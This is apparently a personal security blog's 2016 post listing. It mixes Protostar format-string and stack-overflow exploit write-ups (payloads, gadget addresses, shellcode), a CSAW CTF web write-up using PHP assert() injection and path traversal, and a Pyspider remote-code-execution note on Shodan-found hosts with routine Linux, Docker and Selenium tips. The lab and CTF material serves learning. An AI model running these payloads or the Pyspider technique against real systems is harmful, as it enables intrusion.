Posts

Showing posts from 2016

Exploit Exercises - Format String

Format1: pad until the last memory dump reaches the buffer. Run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'` with %x to find the position of the address in the dump, then run the same with %n to write. DMA:
    /opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`

Format2: need to write a value to an address. POC:
    python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
Layout: | Address | Value | Padding | %n |. DMA:
    python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"' | /opt/protostar/bin/format2

Format3: write 4 bytes to a specified address, one byte per %n. POC:
    python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\
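As an added example (my own code, not the post's), a Python 3 payload builder that does the arithmetic the Format2 and Format3 payloads above do by hand: one %n write whose padding makes printf's character counter hit a target count, and four chained %n writes that leave an arbitrary dword at an address, with each padding computed modulo 256 against what has already been printed. The addresses 0x080496e4 / 0x080496f4 and the %4$n slot are taken from the post; the target count 64, the dword 0x01025544 and the slot used for the Format3 case are assumptions. simulate_n_writes is a model of printf's side effects written for this example, not a real printf.

```python
import struct


def fmt_count_write(addr, count, offset, spec="u"):
    """One %n write, Format2 style.  The 4 address bytes at the front of the
    buffer are printed too, so they count; the padding makes up the rest.
    `offset` is the printf argument slot that holds the address (%offset$n).
    """
    width = count - 4
    if width < 1:
        raise ValueError("count must be larger than the 4 address bytes")
    return struct.pack("<I", addr) + ("%%%d%s%%%d$n" % (width, spec, offset)).encode()


def fmt_dword_write(addr, value, offset, prefix_len=0):
    """Four %n writes, Format3 style: addr, addr+1, addr+2, addr+3 each get the
    low byte of the running character count.  The count only grows, so each
    padding is computed modulo 256 relative to what was already printed.
    Widths are kept >= 8 because %x of an unknown stack word prints up to 8
    characters and a smaller minimum width would not be exact.
    Returns (payload, [pad0, pad1, pad2, pad3])."""
    addrs = b"".join(struct.pack("<I", addr + i) for i in range(4))
    payload = bytearray(addrs)
    written = prefix_len + len(addrs)
    pads = []
    for i in range(4):
        want = (value >> (8 * i)) & 0xFF
        pad = (want - written) % 256
        if pad < 8:
            pad += 256
        written += pad
        assert (written & 0xFF) == want
        payload += ("%%%dx%%%d$n" % (pad, offset + i)).encode()
        pads.append(pad)
    return bytes(payload), pads


def simulate_n_writes(addr, pads, prefix_len=0):
    """Model (for this example) of what fmt_dword_write makes printf do: each
    %n stores the full 32-bit counter little-endian at addr+i, so the final
    write spills three bytes past addr+3.  Returns (dword at addr, spill)."""
    mem = {}
    written = prefix_len + 16          # the four packed addresses were printed
    for i, pad in enumerate(pads):
        written += pad
        for j, b in enumerate(struct.pack("<I", written)):
            mem[addr + i + j] = b
    dword = int.from_bytes(bytes(mem[addr + k] for k in range(4)), "little")
    spill = bytes(mem[addr + 4 + k] for k in range(3))
    return dword, spill


if __name__ == "__main__":
    # Format2 style: counter reaches 64 (assumed target) when %4$n fires.
    print(fmt_count_write(0x080496e4, 64, 4))
    # Format3 style: leave 0x01025544 (assumed value) at 0x080496f4.
    payload, pads = fmt_dword_write(0x080496f4, 0x01025544, 4)
    print(payload, pads, simulate_n_writes(0x080496f4, pads))
```

The spill bytes returned by simulate_n_writes are the reason %hhn is preferred when the three bytes after the target must survive; with plain %n, as used in the post, order the writes so the clobbered bytes are ones you do not care about.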

Exploit Exercises - Protostar Stack 7

In this level, the app checks that the return address does not start with 0xb, so a stack address cannot be returned to directly. So I use a pop pop ret gadget to load the real return address from the stack and call it. Found pop pop ret at: 0x08048492

This is the payload layout:
    | "A" * 80 | gadget address | 8 bytes junk | NOP sled address | NOPs to absorb stack shifting | shellcode |

This is the shellcode:
    \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load the POC into gdb, debug, set breakpoints, etc. I found the NOP sled start at: 0xbffff698. OK, build the POC:
    (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
    (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"
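As an added example (my own code, not the post's), a Python 3 script that builds the payload described above and then walks the stack the way the CPU will, which shows why exactly 8 junk bytes sit between the gadget and the sled address. The 80-byte offset, the gadget address, the sled address and the shellcode are the post's; the mask used to model the "must not start with 0xb" check is an assumption that matches the post's description, not the binary's source.

```python
import struct

# Shellcode copied from the post (opens /dev/tty, then execve /bin//sh).
SHELLCODE = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9"
             b"\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
             b"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

RET_OFFSET = 80           # "A"*80 reaches the saved return address
POP_POP_RET = 0x08048492  # pop; pop; ret gadget in the binary (from the post)
SLED_ADDR = 0xbffff698    # start of the NOP sled found in gdb (from the post)


def ret_check_rejects(ret):
    """The post says the level refuses a return address starting with 0xb.
    Assumed mask modelling that description; not the binary's own source."""
    return (ret & 0xb0000000) == 0xb0000000


def build_payload(gadget=POP_POP_RET, sled_addr=SLED_ADDR, nops=40):
    """Layout: A*80 | gadget | 8 junk bytes | sled address | NOPs | shellcode.
    The gadget lives in the 0x0804xxxx text segment, so it passes the check;
    the stack address is only ever popped by the gadget's own, unchecked ret."""
    if ret_check_rejects(gadget):
        raise ValueError("gadget address 0x%08x would be rejected" % gadget)
    return (b"A" * RET_OFFSET
            + struct.pack("<I", gadget)
            + b"C" * 8                      # eaten by the two pops
            + struct.pack("<I", sled_addr)  # popped by the gadget's ret
            + b"\x90" * nops
            + SHELLCODE)


def trace_returns(payload, gadget=POP_POP_RET):
    """Walk the stack after the overflow: ret -> gadget (the checked address),
    pop; pop -> skip 8 bytes, ret -> next dword on the stack.
    Returns (first_ret_target, final_eip)."""
    sp = RET_OFFSET
    first = struct.unpack_from("<I", payload, sp)[0]
    sp += 4
    if first != gadget:
        raise ValueError("return address slot does not hold the gadget")
    sp += 8                                  # pop; pop
    final = struct.unpack_from("<I", payload, sp)[0]
    return first, final


if __name__ == "__main__":
    p = build_payload()
    print("first ret -> 0x%08x, final eip -> 0x%08x" % trace_returns(p))
```

If the gadget were pop; ret instead, the junk would shrink to 4 bytes; trace_returns would then report the wrong final eip, which is the quickest way to catch a miscounted layout before touching gdb.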

Exploit Exercises - Protostar Stack 6

It is free time, so I had some time to play exploit-exercises. Today I play stack level 6. I learned something about return-to-libc. Use gdb to disassemble:

    # gdb -q /opt/protostar/bin/stack6
    (gdb) disas main
    Dump of assembler code for function main:
    0x080484fa :    push   %ebp
    0x080484fb :    mov    %esp,%ebp
    0x080484fd :    and    $0xfffffff0,%esp
    0x08048500 :    call   0x8048484
    0x08048505 :    mov    %ebp,%esp
    0x08048507 :    pop    %ebp
    0x08048508 :    ret
    End of assembler dump.
    (gdb) disas getpath
    Dump of assembler code for function getpath:
    0x08048484 :    push   %ebp
    0x08048485 :    mov    %esp,%ebp
    0x08048487 :    sub    $0x68,%esp
    0x0804848a :    mov    $0x80485d0,%eax
    0x0804848f :    mov    %eax,(%esp)
    0x08048492 :    call   0x80483c0
    0x08048497 :    mov    0x8049720,%eax
    0x0804849c :    mov    %eax,(%esp)
    0x0804849f :    call   0x80483b0
    0x080484a4 :    lea    -0x4c(%ebp),%eax
    0x080484a7 :    mov    %eax,(%esp)
    0x080484aa :    call

Some experience when use Docker

This week my job is to set up ELK with Suricata. I chose Docker as the platform to run everything on, and now I have some experience with it:

1. Use docker-compose. It is very good for production deployment: build && run. Install docker-compose via pip.
2. Build your own image to create a custom start-up distro.
3. I used docker-compose version 2 syntax; notice the differences between versions, like network vs net.
4. Use the network setting (--net) if you need to monitor traffic or use all network cards.
5. You cannot use the cd command in a Dockerfile; you must use WORKDIR. Read the Dockerfile documentation very carefully.
6. Use links. When you use them, the linked container is started before the main one. You can also run it manually and start the main container afterwards; make sure it has started.
7. In the docker command, you must use a command that holds the tty, like: suricata -c xxx or python manager server 0.0.0.0:8080

---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco L

Tampermonkey HelloWorld and create menuCommand

Today I needed to write a script with Tampermonkey. It is very hard :(. To write hello world: create a new script and edit the config header. Add:
    // @connect      *
    // @match        http://*/*
    // @match        https://*/*
You can edit author, homepage, etc. Add your code in the main code below the header comment. I used console.log(). I needed to create a button in the menu, so I used GM_registerMenuCommand. Edit the config: remove "@grant none" and add:
    // @grant        GM_registerMenuCommand
You will see a new menu button in Tampermonkey.

[Writeup] CSAW CTF 2016

mfw (125)
The main URL: http://web.chal.csaw.io:8000
Fuzzing it is easy. The page parameter is concatenated into a PHP string that is evaluated (the flag name gives away that it is an assert()), so closing the quote lets us inject code:
    http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27
Play with the flag:
    http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}

wtf.sh 1 (150)
http://web.chal.csaw.io:8001
Register an account and log in. Create a post, view the post. Fuzzing now, I found directory traversal (WTF? traversal again). When fuzzing to:
    http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../
I found some source code. I guessed that maybe I can read all files in this directory, like cat * :)). I found some interesting functions (after using a decoder to view the beautified code):
    function hash_password {
        local password=$1;
        (shasum <<< ${password}) | cut -d\  -f1;
    }
    # hash usernames for lookup in the users_lookup table
    function hash_username {
        local username=$1;
        (shasum <<< ${username}) | cut -d\  -f1;
    }
    # generate a random token, bas

RCE in Pyspider

Today I read an article about exploiting debug mode in Werkzeug. It is old, but very interesting. When I searched Shodan, I found about 30 websites running pyspider. Pyspider is open-source Python software; you can download and install it from: https://github.com/binux/pyspider It had one problem: no authentication. Anyone can access it. When you click on a project, you can go to the debug mode, and there you can edit the Python code. So you can use it to execute code. It is RCE. This is my POC:
    import subprocess
    p = subprocess.Popen(["id", "-m"], stdout=subprocess.PIPE)
    output, err = p.communicate()
    print(output)

Install Skype and Facebook Message Plugin for Ubuntu

In Windows it is easy to install the Facebook app and the Skype app. But on Ubuntu I want one app for both services, so I chose Pidgin.

1. Install the Facebook plugin. We use purple-facebook:
    sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list"
    cd /tmp && wget http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key
    sudo apt-key add - < Release.key
    sudo apt-get update
    sudo apt-get install purple-facebook
Add your Facebook account in Manage Accounts.

2. Install the Skype plugin. We use skypeweb:
    sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc
    git clone git://github.com/EionRobb/skype4pidgin.git
    cd skype4pidgin/skypeweb
    mkdir build
    cd build
    cmake ..
    cpack
    sudo dpkg -i skypeweb-1.1.0-Linux.deb
Add your Skype account in Manage Accounts.

Use marco to Anti-CSRF token in Burpsuite

While I was reading a paper about Burp Suite tricks, it talked about Burp Suite macros and how we can use them to handle anti-CSRF tokens. I tried it with this demo: http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php The first request gets the token in the HTML (formtoken), and the POST request (request 2) uses it to check. Now we need to use a macro to get the token automatically and add it to the POST data. Make sure both requests and responses are in the HTTP proxy history, and that intercept is off. Go to Project options (version > 1.7) or Options (<= 1.6, I am not sure). I used the Pro version. Choose the Session tab. In Session handling rules, add a new rule. Type your rule name, like "Anti CSRF Rule for xx.com". In Rule actions, choose Add, with the "Run a post-request macro" type. You will see the action editor. Add new macros by clicking Add; the macro editor and macro recorder windows open. Now, in the macro recorder you must choose 2 requests: request 1 is the request that gets the token, and request 2 is the action request that uses the token (cho
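As an added example (my own code, not the paper's and not Burp's), the same session-handling idea in Python 3 for when the check has to run outside Burp: before each POST, re-fetch the form page, pull the hidden formtoken field out of the HTML, and copy it into the request body. The field name formtoken comes from the post; the form snippet and the token values in it are constructed for this example, and fetch_form is injected so the code runs offline against that constructed page.

```python
import html.parser
from urllib.parse import urlencode


class HiddenInputs(html.parser.HTMLParser):
    """Collect <input type="hidden" name=... value=...> fields from a page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def extract_token(page_html, name="formtoken"):
    """Return the current anti-CSRF token, or fail loudly if the form lacks it
    (a silent empty token is how replays go unnoticed)."""
    p = HiddenInputs()
    p.feed(page_html)
    try:
        return p.fields[name]
    except KeyError:
        raise ValueError("no hidden field %r in page" % name)


def build_post_body(fields, token, name="formtoken"):
    """Add the freshly fetched token to the form-encoded body."""
    body = dict(fields)
    body[name] = token
    return urlencode(body)


class TokenSession:
    """Like a Burp post-request macro: every POST is preceded by a fetch of the
    form page and the current token is copied into the request.  fetch_form is
    any callable returning the form's HTML."""

    def __init__(self, fetch_form, name="formtoken"):
        self.fetch_form = fetch_form
        self.name = name
        self.last_token = None

    def prepare_post(self, fields):
        self.last_token = extract_token(self.fetch_form(), self.name)
        return build_post_body(fields, self.last_token, self.name)


# Constructed stand-in for the stage-2 demo form; the token value is made up.
SAMPLE_FORM = """<form method="post" action="form_token_demo_stage2.php">
<input type="hidden" name="formtoken" value="a1b2c3d4">
<input type="text" name="amount"><input type="submit" value="Go">
</form>"""


if __name__ == "__main__":
    session = TokenSession(lambda: SAMPLE_FORM)
    print(session.prepare_post({"amount": "10"}))
```

Because the token is re-read on every call, a server that rotates it per request is handled the same way as one that keeps it fixed, which is exactly the case the Burp macro is there for.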

Automount partition in Ubuntu with fstab

Before using Ubuntu, I had Windows installed. I had 2 NTFS partitions that are not auto-mounted; they only mount when I click the disk icon. I need them auto-loaded, so that I can run many applications from these partitions. First, find the UUID of each partition in /dev/disk/by-uuid. Then edit /etc/fstab and add:
    UUID=327E4E257E4DE1E9 /mnt/sdb1/ ntfs rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000 0 0
    UUID=38D822D9D82294E2 /mnt/sdb2/ ntfs rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000 0 0
with the UUIDs I found, and uid being the id of my user. To add this location to the menu bar, use "Bookmark this location" in Gnome.

Some experience while working with ElasticSearch, Angular

This week I joined a project that needs a web portal. My hobby is Python, so I chose Flask and AngularJS. I am using Bootstrap for the CSS template. My DB is ElasticSearch. I don't use raw HTTP requests to query ES; I use the python-es library. So when using ES, I had some problems.

1. Sort in ES:
    data = self.es.search(index=self.indexName, doc_type=self.docType,
                          body={"query": {
                                    "filtered": {
                                        "query": {
                                            "bool": {
                                                "must": mustDict,
                                            },
                                        }
                                    }
                                },
                                "size": size, "from": from_, "sort": {"ti

Popup interactive in Selenimum

When developing the AWATT tool, I got this problem: after a click, a pop-up alert window shows and must be confirmed (accept or dismiss) to continue. You cannot use a Selenium selector to control it. This is the solution:

    from selenium import webdriver
    import time

    url = "http://www.javascripter.net/faq/alert.htm"
    driver = webdriver.Firefox()
    driver.get(url)
    element = driver.find_element_by_xpath("//input[@type='button']")
    element.click()
    alert = driver.switch_to.alert   # switch_to_alert() is the older, deprecated spelling
    time.sleep(2)
    alert.accept()   # or alert.dismiss()

File Upload with Selenium

Yesterday my brother asked me: "How do you automatically upload a file with Selenium?" Today I had free time to solve it. Try this code; I used the Python binding:

    from selenium import webdriver

    url = "https://encodable.com/uploaddemo/"
    driver = webdriver.Firefox()
    driver.get(url)
    element = driver.find_element_by_id("uploadname1")
    element.send_keys("/home/habachnam/a.txt")   # type the local path into the file input

Install Metasploit Ubuntu quick way

Install Metasploit in Ubuntu:
    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
      chmod 755 msfinstall && \
      ./msfinstall
Read the downloaded msfinstall script before running it; it adds a package repository and its signing key to your system. Now you can use apt-get update to update Metasploit.

Get a Unity-like appmenu (global menu) in Ubuntu Gnome Session Fallback

When I use Ubuntu, the first thing I install is gnome-session-fallback, because I like the classic app menu. But if you use Hopper Disassembler, it only shows its app menu in Unity. I found a way to display the app menu in gnome-session-fallback:
    sudo apt-get install indicator-applet-appmenu
After installing it, move the mouse to the top panel, press the Windows (Super) key + Alt + right click, choose Add to panel, select indicator-applet-appmenu, and choose Add. Now you can use the Unity app menu.